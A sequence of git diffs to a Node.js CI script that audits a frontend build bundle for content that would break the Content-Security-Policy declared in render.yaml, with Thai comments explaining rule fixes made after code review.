-      for (const match of content.matchAll(/\son[a-z]+\s*=\s*["']/gi)) {
+      // `["']?` เพราะ HTML ยอมให้ค่า attribute ไม่มีเครื่องหมายคำพูด (`<button onclick=go()>`)
+      // ซึ่งของเดิมหลุด — `frontend/public/50x.html` เป็นไฟล์ที่คนแก้ด้วยมือ จึงเกิดได้จริง
+      for (const match of content.matchAll(/\son[a-z]+\s*=\s*["']?/gi)) {
         add(file, 'inline-event-handler', 'script-src', `พบ inline event handler: ${match[0].trim()}`);
       }
     }
 
-    // R2 — eval / new Function (script-src ที่ไม่มี 'unsafe-eval')
-    if ((ext === '.js' || ext === '.mjs') && !allowsDynamicCode) {
-      for (const pattern of [/\beval\s*\(/g, /\bnew\s+Function\s*\(/g]) {
+    // R2 — eval / Function constructor (script-src ที่ไม่มี 'unsafe-eval')
+    // ครอบ `Function(` ที่ไม่มี `new` ด้วย เพราะ `Function("return this")()` เป็นสำนวน
+    // มาตรฐานของ polyfill ที่ bundler ลากติดมาบ่อยกว่า `new Function(` มาก (code review I1)
+    // **ข้อจำกัดที่รู้ตัว**: indirect eval (`(0,eval)(...)`, `window["eval"](...)`) และ
+    // `setTimeout("code")` regex จับไม่ได้โดยธรรมชาติ — gate นี้จึงลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี
+    if (!allowsDynamicCode) {
+      for (const pattern of [/\beval\s*\(/g, /\b(?:new\s+)?Function\s*\(/g]) {
         for (const match of content.matchAll(pattern)) {
           add(file, 'dynamic-code', 'script-src', `พบการสร้างโค้ดตอน runtime: ${match[0].trim()}`);
         }
@@ -174,17 +230,33 @@ function auditBundle(distDir, cspValue) {
     }
   }
 
-  return { findings, scanned: files.length };
+  return { findings, inspected, skipped, scanned: files.length };
 }
 
-/** อ่าน CSP ที่ประกาศไว้จริงใน render.yaml — fail-closed ถ้าหาไม่เจอ */
+/**
+ * อ่าน CSP ที่ประกาศไว้จริงใน render.yaml — fail-closed ถ้าหาไม่เจอ
+ *
+ * กรองด้วย path `/*` เท่านั้น และ throw ถ้าเจอ CSP บน path อื่น — ถ้าวันหน้ามีคนเพิ่ม CSP
+ * เฉพาะ `/assets/*` (ซึ่งคือ path ของเกือบทุกอย่างใน dist) การหยิบ entry แรกมาใช้เงียบ ๆ
+ * จะทำให้ตรวจ bundle เทียบ policy ผิดตัว = false PASS · `verify-live-headers.mjs` ป้องกัน
+ * เรื่องเดียวกันไว้แล้วด้วย buildExpectations() ที่ throw เมื่อเจอ path group ที่ไม่รู้จัก
+ */
 function readPolicyFromRenderYaml() {
   const entries = parseRenderHeaders(readFileSync(RENDER_YAML, 'utf8'));
-  const entry = entries.find((e) => e.name === CSP_HEADER);
-  if (!entry) {
-    throw new Error(`ไม่พบ header ${CSP_HEADER} ใน render.yaml — gate นี้ตรวจเทียบ policy ที่ประกาศจริงเท่านั้น`);
+  const csp = entries.filter((e) => CSP_HEADERS.includes(e.name));
+  const offPath = csp.filter((e) => e.path !== SHELL_PATH);
+  if (offPath.length > 0) {
+    throw new Error(
+      `render.yaml ประกาศ CSP บน path ที่ gate นี้ยังไม่รองรับ: ${[...new Set(offPath.map((e) => e.path))].join(', ')} — ` +
+        `ขยาย readPolicyFromRenderYaml (และเทส) ก่อน ไม่งั้น bundle จะถูกตรวจเทียบ policy ผิดตัว`
+    );
   }
-  return entry.value;
+  // enforce มาก่อน report-only: ถ้ามีทั้งคู่ ตัวที่บังคับใช้จริงคือตัวที่ต้องผ่าน
+  for (const name of CSP_HEADERS) {
+    const entry = csp.find((e) => e.name === name && e.path === SHELL_PATH);
+    if (entry) return entry.value;
+  }
+  throw new Error(`ไม่พบ header ${CSP_HEADERS.join(' หรือ ')} บน path ${SHELL_PATH} ใน render.yaml — gate นี้ตรวจเทียบ policy ที่ประกาศจริงเท่านั้น`);
 }
 
 function main() {
@@ -193,10 +265,13 @@ function main() {
 
   console.log('CSP bundle audit — issue #113');
   console.log(`dist:   ${dist}`);
-  console.log(`policy: ${CSP_HEADER} (จาก render.yaml)`);
+  console.log('policy: จาก render.yaml (path /*)');
 
-  const { findings, scanned } = auditBundle(dist, policyValue);
-  console.log(`ตรวจแล้ว ${scanned} ไฟล์`);
+  const { findings, inspected, skipped, scanned } = auditBundle(dist, policyValue);
+  // แยก "อ่านเนื้อหาจริง" ออกจาก "เดินผ่าน" และพิมพ์รายชื่อที่ข้ามเสมอ — ตัวเลขรวมอย่างเดียว
+  // เคยทำให้เข้าใจผิดว่าตรวจครบทั้งที่ 3 ไฟล์ไม่เคยถูกเปิด (code review C1)
+  console.log(`ตรวจเนื้อหา ${inspected} ไฟล์ · ข้าม ${skipped.length} ไฟล์ (จากทั้งหมด ${scanned})`);
+  for (const s of skipped) console.log(`  – ข้าม ${s.file}: ${s.reason}`);
 
   if (findings.length > 0) {
     console.error('');

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -29,7 +29,6 @@ const DEFAULT_DIST = resolve(ROOT, 'frontend', 'dist');
 const CSP_HEADERS = ['Content-Security-Policy', 'Content-Security-Policy-Report-Only'];
 const SHELL_PATH = '/*';
 
-const HTML_EXTENSIONS = new Set(['.html', '.htm', '.svg']);
 const FONT_EXTENSIONS = new Set(['.woff', '.woff2', '.ttf', '.otf', '.eot']);
 
 /**
@@ -103,24 +102,64 @@ function parseCspPolicy(value) {
   return policy;
 }
 
-/**
- * origin ทั้งหมดที่ policy อนุญาต (จาก source ที่เป็น URL) — allowlist หลักมาจากตรงนี้
- * ไม่ใช่จากรายการที่เขียนไว้ในไฟล์นี้ เพื่อให้แก้ policy แล้ว gate ตามเอง
- */
-function allowedOriginsFrom(policy) {
+/** origin ที่ source list ชุดหนึ่งอนุญาต — keyword อย่าง 'self'/'none' ไม่ใช่ origin จึงถูกข้าม */
+function originsOf(sources) {
   const origins = new Set();
-  for (const sources of policy.values()) {
-    for (const source of sources) {
-      if (!/^https?:\/\//.test(source)) continue;
-      try {
-        origins.add(new URL(source).origin.toLowerCase());
-      } catch {
-        // source ที่ไม่ใช่ URL เต็ม (เช่น host pattern) — ข้ามไป ไม่ใช่ allowlist ที่เชื่อได้
-      }
+  for (const source of sources ?? []) {
+    if (!/^https?:\/\//.test(source)) continue;
+    try {
+      origins.add(new URL(source).origin.toLowerCase());
+    } catch {
+      // source ที่ไม่ใช่ URL เต็ม (เช่น host pattern) — ข้ามไป ไม่ใช่ allowlist ที่เชื่อได้
     }
   }
   return origins;
 }
+
+/**
+ * origin ที่ policy อนุญาต **รวมทุก directive** — ใช้ได้เฉพาะกับ URL ที่บอกบริบทไม่ได้
+ * (สตริงลอย ๆ ใน bundle ที่ static analysis ไม่รู้ว่าจะถูกใช้โหลดอะไร)
+ *
+ * **ห้ามใช้กับ URL ที่รู้บริบทแล้ว** — origin ที่ policy อนุญาตไว้เพื่อโหลดฟอนต์จะกลายเป็น
+ * ใบผ่านให้ยิง API ทั้งที่ `connect-src` ไม่ได้อนุญาต ซึ่งคือความเสี่ยงข้อ 1 ในเอกสาร
+ * (`VITE_API_URL` แบบ absolute) ที่ gate นี้มีไว้จับโดยตรง — review C1 พิสูจน์ว่า
+ * `fetch("https://fonts.gstatic.com/…")` เคยผ่านฉลุยเพราะ gstatic อยู่ใน `font-src`
+ */
+function allowedOriginsFrom(policy) {
+  const origins = new Set();
+  for (const sources of policy.values()) {
+    for (const origin of originsOf(sources)) origins.add(origin);
+  }
+  return origins;
+}
+
+/**
+ * directive ที่ควบคุมการโหลด subresource — ใช้บอกผู้อ่านว่า finding เทียบกับอะไรจริง ๆ
+ * คำนวณจาก policy ที่ parse มา ไม่ใช่รายการที่พิมพ์ค้างไว้ ซึ่งเคยตกหล่น `style-src`
+ */
+const FETCH_DIRECTIVES = ['connect-src', 'img-src', 'font-src', 'style-src', 'script-src', 'media-src'];
+
+/**
+ * รูปแบบการเรียกที่ทำให้เกิด request ใต้ `connect-src` — capture group 1 คือ URL
+ *
+ * **ข้อจำกัดที่รู้ตัว**: เห็นเฉพาะ URL ที่เป็น string literal ตรง ๆ ในวงเล็บ · URL ที่
+ * ประกอบจากตัวแปร (`fetch(base + path)`) มองไม่เห็น — allowlist รวมยังคุมสตริงลอยอีกชั้น
+ * gate นี้จึงลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี (หลักการเดียวกับข้อจำกัดของ R2)
+ */
+const CONNECT_CALL_PATTERNS = [
+  /\b(?:fetch|Request)\s*\(\s*["'`]([^"'`]+)/g,
+  /\baxios(?:\.\w+)?\s*\(\s*["'`]([^"'`]+)/g,
+  /\.open\s*\(\s*["'][^"']*["']\s*,\s*["'`]([^"'`]+)/g,
+];
+
+/**
+ * `url(//host/…)` ใน CSS — browser สืบ scheme จากหน้าเว็บแล้วโหลดจริง
+ * regex หลักบังคับ `https?://` จึงมองไม่เห็นรูปนี้ ทั้งที่เอกสารบอกว่าครอบ url() ภายนอกแล้ว
+ */
+const CSS_PROTOCOL_RELATIVE_URL = /url\(\s*["']?\/\/([a-zA-Z0-9.-]+(?::\d+)?)/gi;
+
+/** type ที่ browser ไม่ execute (data block) จึงไม่ถูก script-src บล็อก */
+const NON_EXECUTABLE_TYPES = /type\s*=\s*["']?(application\/(ld\+)?json|text\/template)/i;
 
 const hasSource = (policy, directive, source) => (policy.get(directive) ?? []).includes(source);
 
@@ -141,7 +180,8 @@ function walk(dir) {
  * fail-closed: dist ที่ไม่มีอยู่หรือว่างเปล่าคือ "ยังไม่ได้ตรวจ" ไม่ใช่ "ตรวจแล้วสะอาด" —
  * ถ้าปล่อยผ่านเงียบ ๆ gate จะเขียวตอน build ล้มเหลว ซึ่งอันตรายกว่าไม่มี gate
  *
- * @returns {{findings: Array<{file:string, rule:string, directive:string, detail:string}>, scanned:number}}
+ * @returns {{findings: Array<{file:string, rule:string, directive:string, detail:string}>,
+ *   inspected:number, skipped: Array<{file:string, reason:string}>, scanned:number}}
  */
 function auditBundle(distDir, cspValue) {
   if (!existsSync(distDir)) {
@@ -154,6 +194,10 @@ function auditBundle(distDir, cspValue) {
 
   const policy = parseCspPolicy(cspValue);
   const allowedOrigins = allowedOriginsFrom(policy);
+  // allowlist แยกสำหรับ URL ที่รู้บริบทแล้วว่าเป็น request — ต้องผ่าน connect-src เท่านั้น
+  const connectOrigins = originsOf(policy.get('connect-src'));
+  // directive ที่รายงานต้องสะท้อน policy จริง แก้ policy แล้วข้อความตามเอง
+  const consultedDirectives = FETCH_DIRECTIVES.filter((d) => policy.has(d)).join(' / ') || 'default-src';
   const allowsInlineScript = hasSource(policy, 'script-src', "'unsafe-inline'");
   const allowsDynamicCode = hasSource(policy, 'script-src', "'unsafe-eval'");
   const allowsSelfFont = hasSource(policy, 'font-src', "'self'");
@@ -192,30 +236,36 @@ function auditBundle(distDir, cspValue) {
     // R2 (eval/Function) ใช้กับ **ทุกไฟล์ที่อ่าน** ไม่ผูกกับนามสกุล — `eval(` ใน .html หรือ
     // ไฟล์ไม่มีนามสกุล อันตรายเท่ากับใน .js และการผูกกฎกับนามสกุลคือต้นเหตุของ C1
     //
-    // R1 (inline script/handler) ต่างออกไป: ใช้เฉพาะเนื้อหาที่เป็น HTML จริง เพราะ CSP บล็อก
-    // handler ที่เขียนเป็น **attribute ใน markup** เท่านั้น ส่วน `el.onclick = fn` ในไฟล์ JS
-    // เป็นการ assign property ซึ่ง **CSP ไม่บล็อก** (สคริปต์ตัวนั้นผ่าน script-src มาแล้ว)
-    // การยิง regex นี้ใส่ JS ล้วนจึงผิดทั้งเชิงเสียงรบกวนและเชิงความหมาย — พิสูจน์แล้วว่า
-    // ` once = true` และ ` only = 1` ซึ่งเป็นโค้ดปกติถูกจับเป็น handler (code review M-A)
-    // **ข้อจำกัดที่รู้ตัว**: HTML fragment ที่ฝังใน JS โดยไม่มี `<script`/`<html` จะไม่ถูกตรวจข้อนี้
-    const looksLikeHtml = HTML_EXTENSIONS.has(ext) || /<!doctype html|<html\b|<script\b/i.test(content);
-
-    // R1 — inline script / inline event handler (script-src ที่ไม่มี 'unsafe-inline')
-    if (!allowsInlineScript && looksLikeHtml) {
+    // R1 (inline script/handler) ก็ใช้กับทุกไฟล์เช่นกัน แต่**ผูกกับรูปทรงของ markup ไม่ใช่
+    // ชนิดไฟล์** — CSP บล็อก handler ที่เขียนเป็น attribute ใน tag เท่านั้น ส่วน
+    // `el.onclick = fn` ในไฟล์ JS เป็นการ assign property ซึ่ง **CSP ไม่บล็อก**
+    // (สคริปต์ตัวนั้นผ่าน script-src มาแล้ว) การยิง regex ใส่ทั้งไฟล์จึงผิดทั้งเชิงเสียงรบกวน
+    // และเชิงความหมาย — ` once = true` / ` only = 1` เคยถูกจับเป็น handler (code review M-A)
+    //
+    // guard เดิมแก้ด้วยการเดา "ไฟล์นี้เป็น HTML ไหม" ซึ่งพังทันทีที่ chunk เดียวมีทั้ง HTML
+    // fragment และโค้ดปกติ — พอมีสตริง `<script` ปนอยู่ ทั้งไฟล์ถูกพลิกเป็นโหมด HTML แล้ว
+    // false positive เดิมก็กลับมา (review C2) ตอนนี้จำกัดขอบเขตไว้ใน **ช่วงแท็กเปิด**
+    // ซึ่งเป็นที่เดียวที่ inline handler อยู่ได้จริง จึงไม่ต้องเดาชนิดไฟล์อีก
+    if (!allowsInlineScript) {
       // จับที่ **แท็กเปิด** ไม่ใช่คู่เปิด-ปิด เพราะ bundler escape `</script>` เป็น `<\/script>`
       // ในสตริง JS เสมอ (กัน HTML parser ตัดจบก่อนเวลา) กฎที่จับเป็นคู่จึงมองไม่เห็นเคสนั้นเลย
       // — พิสูจน์ด้วยเทส `HTML fragment ที่ฝังใน JS พร้อม <script>`
-      // ข้อยกเว้น: type ที่ browser ไม่ execute (data block) ไม่ถูก script-src บล็อก
-      const NON_EXECUTABLE_TYPES = /type\s*=\s*["']?(application\/(ld\+)?json|text\/template)/i;
       for (const match of content.matchAll(/<script\b([^>]*)>/gi)) {
         const attrs = match[1];
         if (/\bsrc\s*=/i.test(attrs) || NON_EXECUTABLE_TYPES.test(attrs)) continue;
+        // spec R1 พูดถึง inline script "ที่มีเนื้อหา" — แท็กว่างเปล่า browser ไม่บล็อก
+        // รับแท็กปิดทั้งรูปปกติและรูปที่ถูก escape · หาไม่เจอ = ถือว่ามีเนื้อหา (fail-closed)
+        const after = content.slice(match.index + match[0].length);
+        const closeAt = after.search(/<\\?\/script\s*>/i);
+        if (closeAt !== -1 && after.slice(0, closeAt).trim() === '') continue;
         add(file, 'inline-script', 'script-src', `พบ <script> ที่ไม่มี src (โค้ดฝังในตัว): ${match[0].slice(0, 60)}`);
       }
       // `["']?` เพราะ HTML ยอมให้ค่า attribute ไม่มีเครื่องหมายคำพูด (`<button onclick=go()>`)
       // ซึ่งของเดิมหลุด — `frontend/public/50x.html` เป็นไฟล์ที่คนแก้ด้วยมือ จึงเกิดได้จริง
-      for (const match of content.matchAll(/\son[a-z]+\s*=\s*["']?/gi)) {
-        add(file, 'inline-event-handler', 'script-src', `พบ inline event handler: ${match[0].trim()}`);
+      for (const tag of content.matchAll(/<[a-zA-Z][^>]*>/g)) {
+        for (const match of tag[0].matchAll(/\son[a-z]+\s*=\s*["']?/gi)) {
+          add(file, 'inline-event-handler', 'script-src', `พบ inline event handler: ${match[0].trim()} ใน ${tag[0].slice(0, 40)}`);
+        }
       }
     }
 
@@ -237,17 +287,50 @@ function auditBundle(distDir, cspValue) {
     // นับซ้ำแล้วสรุปเป็นรายการเดียวต่อ (ไฟล์ × origin) — ถ้ามีคนตั้ง VITE_API_URL เป็น absolute
     // URL (ความเสี่ยงข้อ 1 ในเอกสาร = เคสที่ gate นี้มีไว้จับ) origin เดียวจะโผล่หลายสิบครั้ง
     // ต่อ chunk การพิมพ์ทีละครั้งทำให้คนอ่านเห็นจอเต็มไปด้วยข้อความเดียวกันแทนที่จะเห็นภาพรวม
+    // R3a — URL ที่ static analysis **รู้บริบทแล้ว** ว่าเป็น request ต้องเทียบกับ connect-src
+    // อย่างเดียว ไม่ใช่ allowlist รวมทุก directive (review C1) · ตรวจก่อนกฎรวม แล้วจำไว้ว่า
+    // origin ไหนรายงานไปแล้ว เพื่อไม่ให้ปัญหาเดียวถูกฟ้องสองครั้งด้วยคนละ directive
+    const reported = new Set();
+    for (const pattern of CONNECT_CALL_PATTERNS) {
+      for (const match of content.matchAll(pattern)) {
+        if (!/^https?:\/\//i.test(match[1])) continue; // relative URL อยู่ใต้ 'self' อยู่แล้ว
+        let origin;
+        try {
+          origin = new URL(match[1]).origin.toLowerCase();
+        } catch {
+          continue; // parse ไม่ได้ — กฎรวมด้านล่างยังเห็นสตริงนี้อยู่ ไม่ได้หลุดไปเงียบ ๆ
+        }
+        if (connectOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) continue;
+        reported.add(origin);
+        add(
+          file,
+          'external-origin',
+          'connect-src',
+          `พบการเรียกข้อมูลไป ${origin} แต่ connect-src อนุญาตแค่ ${(policy.get('connect-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'} — จะถูกบล็อกหลัง enforce`
+        );
+      }
+    }
+
+    // R3b/R4 — URL ที่เหลือซึ่งบอกบริบทไม่ได้ เทียบกับ allowlist รวมตามเดิม
     const originCounts = new Map();
-    for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
-      const origin = match[0].toLowerCase(); // CSP host-source ไม่แยกตัวพิมพ์
-      if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin)) continue;
+    const countOrigin = (origin) => {
+      if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) return;
       originCounts.set(origin, (originCounts.get(origin) ?? 0) + 1);
+    };
+    for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
+      countOrigin(match[0].toLowerCase()); // CSP host-source ไม่แยกตัวพิมพ์
+    }
+    if (ext === '.css') {
+      // browser สืบ scheme จากหน้าเว็บ ซึ่ง production เป็น https เสมอ (มี HSTS)
+      for (const match of content.matchAll(CSS_PROTOCOL_RELATIVE_URL)) {
+        countOrigin(`https://${match[1].toLowerCase()}`);
+      }
     }
     for (const [origin, count] of originCounts) {
       add(
         file,
         'external-origin',
-        'connect-src / img-src / font-src',
+        consultedDirectives,
         `พบ origin ที่ policy ไม่ได้อนุญาต: ${origin}${count > 1 ? ` (${count} ครั้งในไฟล์นี้)` : ''} — ถ้าโค้ดโหลดจากที่นี่จริงจะถูกบล็อกหลัง enforce`
       );
     }

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -631,7 +631,10 @@ function main() {
   console.log('\n✓ PASS: ไม่พบสิ่งที่จะชน policy ใน build output');
 }
 
-export { auditBundle, parseCspPolicy, allowedOriginsFrom, NON_FETCHED_ORIGINS };
+// EVENT_HANDLER_ATTRIBUTES ถูก export เพื่อให้ differential test เทียบชุดเดียวกับที่กฎใช้จริง
+// ไม่ใช่สำเนาที่เพี้ยนออกจากกันได้ — เทสนั้นถาม parse5 ว่า markup มี attribute อะไรบ้าง
+// แล้วคาดหวังให้ gate ฟ้องเฉพาะตัวที่อยู่ในชุดนี้
+export { auditBundle, parseCspPolicy, allowedOriginsFrom, NON_FETCHED_ORIGINS, EVENT_HANDLER_ATTRIBUTES };
 
 if (process.argv[1] && import.meta.url === pathToFileURL(process.argv[1]).href) {
   try {

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -29,6 +29,7 @@ const DEFAULT_DIST = resolve(ROOT, 'frontend', 'dist');
 const CSP_HEADERS = ['Content-Security-Policy', 'Content-Security-Policy-Report-Only'];
 const SHELL_PATH = '/*';
 
+const HTML_EXTENSIONS = new Set(['.html', '.htm', '.svg']);
 const FONT_EXTENSIONS = new Set(['.woff', '.woff2', '.ttf', '.otf', '.eot']);
 
 /**
@@ -112,7 +113,7 @@ function allowedOriginsFrom(policy) {
     for (const source of sources) {
       if (!/^https?:\/\//.test(source)) continue;
       try {
-        origins.add(new URL(source).origin);
+        origins.add(new URL(source).origin.toLowerCase());
       } catch {
         // source ที่ไม่ใช่ URL เต็ม (เช่น host pattern) — ข้ามไป ไม่ใช่ allowlist ที่เชื่อได้
       }
@@ -163,7 +164,8 @@ function auditBundle(distDir, cspValue) {
 
   for (const file of files) {
     const ext = extname(file).toLowerCase();
-    const base = file.split(/[\\/]/).pop();
+    // เทียบด้วย path จากรากของ dist ไม่ใช่ชื่อไฟล์ล้วน — ไม่งั้นไฟล์ชื่อซ้ำในโฟลเดอร์ย่อย
+    // จะถูกยกเว้นตามไปด้วยโดยไม่ตั้งใจ
     const rel = relative(distDir, file).replace(/\\/g, '/');
 
     // R5 — font ที่ self-host จะถูกบล็อกถ้า font-src ไม่มี 'self'
@@ -174,8 +176,8 @@ function auditBundle(distDir, cspValue) {
       skipped.push({ file: rel, reason: 'ไฟล์ font — ตรวจด้วยกฎ self-hosted-font ไม่ต้องอ่านเนื้อหา' });
       continue;
     }
-    if (NON_BROWSER_FILES.has(base)) {
-      skipped.push({ file: rel, reason: NON_BROWSER_FILES.get(base) });
+    if (NON_BROWSER_FILES.has(rel)) {
+      skipped.push({ file: rel, reason: NON_BROWSER_FILES.get(rel) });
       continue;
     }
     if (BINARY_EXTENSIONS.has(ext)) {
@@ -187,15 +189,28 @@ function auditBundle(distDir, cspValue) {
     inspected++;
     const content = readFileSync(file, 'utf8');
 
-    // R1/R2 ใช้กับ **ทุกไฟล์ที่อ่าน** ไม่ผูกกับนามสกุล — `<script>` ใน .svg และ `eval(` ใน .html
-    // อันตรายเท่ากับใน .js และการผูกกฎกับนามสกุลคือวิธีเดียวกับที่ทำให้ C1 เกิดขึ้น
+    // R2 (eval/Function) ใช้กับ **ทุกไฟล์ที่อ่าน** ไม่ผูกกับนามสกุล — `eval(` ใน .html หรือ
+    // ไฟล์ไม่มีนามสกุล อันตรายเท่ากับใน .js และการผูกกฎกับนามสกุลคือต้นเหตุของ C1
+    //
+    // R1 (inline script/handler) ต่างออกไป: ใช้เฉพาะเนื้อหาที่เป็น HTML จริง เพราะ CSP บล็อก
+    // handler ที่เขียนเป็น **attribute ใน markup** เท่านั้น ส่วน `el.onclick = fn` ในไฟล์ JS
+    // เป็นการ assign property ซึ่ง **CSP ไม่บล็อก** (สคริปต์ตัวนั้นผ่าน script-src มาแล้ว)
+    // การยิง regex นี้ใส่ JS ล้วนจึงผิดทั้งเชิงเสียงรบกวนและเชิงความหมาย — พิสูจน์แล้วว่า
+    // ` once = true` และ ` only = 1` ซึ่งเป็นโค้ดปกติถูกจับเป็น handler (code review M-A)
+    // **ข้อจำกัดที่รู้ตัว**: HTML fragment ที่ฝังใน JS โดยไม่มี `<script`/`<html` จะไม่ถูกตรวจข้อนี้
+    const looksLikeHtml = HTML_EXTENSIONS.has(ext) || /<!doctype html|<html\b|<script\b/i.test(content);
+
     // R1 — inline script / inline event handler (script-src ที่ไม่มี 'unsafe-inline')
-    if (!allowsInlineScript) {
-      for (const match of content.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
-        const [, attrs, body] = match;
-        if (body.trim() !== '' && !/\bsrc\s*=/i.test(attrs)) {
-          add(file, 'inline-script', 'script-src', `พบ <script> ที่มีเนื้อหาในตัว: ${body.trim().slice(0, 60)}`);
-        }
+    if (!allowsInlineScript && looksLikeHtml) {
+      // จับที่ **แท็กเปิด** ไม่ใช่คู่เปิด-ปิด เพราะ bundler escape `</script>` เป็น `<\/script>`
+      // ในสตริง JS เสมอ (กัน HTML parser ตัดจบก่อนเวลา) กฎที่จับเป็นคู่จึงมองไม่เห็นเคสนั้นเลย
+      // — พิสูจน์ด้วยเทส `HTML fragment ที่ฝังใน JS พร้อม <script>`
+      // ข้อยกเว้น: type ที่ browser ไม่ execute (data block) ไม่ถูก script-src บล็อก
+      const NON_EXECUTABLE_TYPES = /type\s*=\s*["']?(application\/(ld\+)?json|text\/template)/i;
+      for (const match of content.matchAll(/<script\b([^>]*)>/gi)) {
+        const attrs = match[1];
+        if (/\bsrc\s*=/i.test(attrs) || NON_EXECUTABLE_TYPES.test(attrs)) continue;
+        add(file, 'inline-script', 'script-src', `พบ <script> ที่ไม่มี src (โค้ดฝังในตัว): ${match[0].slice(0, 60)}`);
       }
       // `["']?` เพราะ HTML ยอมให้ค่า attribute ไม่มีเครื่องหมายคำพูด (`<button onclick=go()>`)
       // ซึ่งของเดิมหลุด — `frontend/public/50x.html` เป็นไฟล์ที่คนแก้ด้วยมือ จึงเกิดได้จริง
@@ -218,14 +233,22 @@ function auditBundle(distDir, cspValue) {
     }
 
     // R3/R4 — absolute URL ที่ไม่ได้อยู่ใน policy และไม่ใช่ URL ที่ไม่ถูก fetch
+    //
+    // นับซ้ำแล้วสรุปเป็นรายการเดียวต่อ (ไฟล์ × origin) — ถ้ามีคนตั้ง VITE_API_URL เป็น absolute
+    // URL (ความเสี่ยงข้อ 1 ในเอกสาร = เคสที่ gate นี้มีไว้จับ) origin เดียวจะโผล่หลายสิบครั้ง
+    // ต่อ chunk การพิมพ์ทีละครั้งทำให้คนอ่านเห็นจอเต็มไปด้วยข้อความเดียวกันแทนที่จะเห็นภาพรวม
+    const originCounts = new Map();
     for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
-      const origin = match[0];
+      const origin = match[0].toLowerCase(); // CSP host-source ไม่แยกตัวพิมพ์
       if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin)) continue;
+      originCounts.set(origin, (originCounts.get(origin) ?? 0) + 1);
+    }
+    for (const [origin, count] of originCounts) {
       add(
         file,
         'external-origin',
         'connect-src / img-src / font-src',
-        `พบ origin ที่ policy ไม่ได้อนุญาต: ${origin} — ถ้าโค้ดโหลดจากที่นี่จริงจะถูกบล็อกหลัง enforce`
+        `พบ origin ที่ policy ไม่ได้อนุญาต: ${origin}${count > 1 ? ` (${count} ครั้งในไฟล์นี้)` : ''} — ถ้าโค้ดโหลดจากที่นี่จริงจะถูกบล็อกหลัง enforce`
       );
     }
   }

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -1,0 +1,225 @@
+#!/usr/bin/env node
+// CSP bundle audit — issue #113 (R2): ตรวจ build output ว่าจะชน CSP หลัง enforce ไหม
+//
+// ทำไมต้องมี: การตรวจว่า bundle มีอะไรที่ policy จะบล็อกบ้าง เคยทำด้วยการ "อ่านด้วยตา"
+// แล้วบันทึกเป็นร้อยแก้วใน docs/frontend-security-headers.md — ครอบแค่ 6 chunk จากของจริง 65
+// ไฟล์ ส่วนที่เหลือไม่เคยถูกตรวจเลย และไม่มีอะไรกันไม่ให้ chunk ใหม่พาของต้องห้ามเข้ามา
+//
+// สคริปต์นี้อ่าน policy จาก render.yaml (single source of truth เดียวกับ verify-live-headers.mjs)
+// แล้วสแกน frontend/dist ทั้งโฟลเดอร์ — กฎทุกข้อผูกกับ directive จริง ไม่ใช่กฎที่ hardcode ไว้
+// แก้ policy ให้ผ่อนลง กฎที่เกี่ยวข้องก็ผ่อนตามเอง (มีเทสยืนยันทั้งสองทิศ)
+//
+// Usage: node scripts/audit-bundle-csp.mjs [--dist <path>]
+//   --dist  ใช้ตอนเทสกับ fixture (default = frontend/dist)
+// Exit 0 = ไม่พบสิ่งที่จะชน policy, Exit 1 = พบ / ไม่มี dist / parse policy ไม่ได้
+//
+// ไม่ยิงเครือข่าย ไม่ใช้ Docker — รันเป็น CI gate ได้จริง (ต้องรันหลัง npm run build)
+
+import { readFileSync, readdirSync, existsSync, statSync } from 'node:fs';
+import { resolve, dirname, join, extname, relative } from 'node:path';
+import { fileURLToPath, pathToFileURL } from 'node:url';
+import { parseRenderHeaders } from './verify-live-headers.mjs';
+
+const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..');
+const RENDER_YAML = resolve(ROOT, 'render.yaml');
+const DEFAULT_DIST = resolve(ROOT, 'frontend', 'dist');
+const CSP_HEADER = 'Content-Security-Policy-Report-Only';
+
+const FONT_EXTENSIONS = new Set(['.woff', '.woff2', '.ttf', '.otf', '.eot']);
+const TEXT_EXTENSIONS = new Set(['.js', '.mjs', '.css', '.html']);
+
+/**
+ * origin ที่ปรากฏใน bundle ได้โดยไม่ถูก browser โหลดจริง จึงไม่อยู่ใต้ directive ใด
+ *
+ * **ห้ามเติมโดยไม่เขียนเหตุผล** — เทส `ข้อยกเว้นทุกตัวใน allowlist ต้องมีเหตุผลเขียนกำกับ`
+ * บังคับให้ทุก entry มีคำอธิบาย เพราะรายการนี้คือช่องเดียวที่ทำให้ gate มองข้ามของได้
+ * ถ้าเติมมั่วโดยไม่คิด gate จะเงียบในวันที่ควรจะดัง
+ */
+const NON_FETCHED_ORIGINS = new Map([
+  ['http://www.w3.org', 'XML/SVG namespace identifier — เป็นสตริงระบุ namespace ไม่ใช่ URL ที่ browser ไปโหลด'],
+  ['https://vuejs.org', 'ลิงก์ในข้อความ error ของ Vue — ถูกแสดงเป็นข้อความให้คนอ่าน ไม่มีการ fetch'],
+  ['https://tailwindcss.com', 'อยู่ในคอมเมนต์ลิขสิทธิ์ที่ Tailwind ใส่มากับ CSS (/*! tailwindcss ... MIT License ... */) — คอมเมนต์ไม่ทำให้เกิด request'],
+]);
+
+function parseArgs(argv) {
+  const args = { dist: DEFAULT_DIST };
+  for (let i = 0; i < argv.length; i++) {
+    const arg = argv[i];
+    if (arg === '--dist' && argv[i + 1] && !argv[i + 1].startsWith('--')) {
+      args.dist = resolve(argv[i + 1]);
+      i++;
+      continue;
+    }
+    if (arg.startsWith('--dist=')) {
+      args.dist = resolve(arg.slice('--dist='.length));
+      continue;
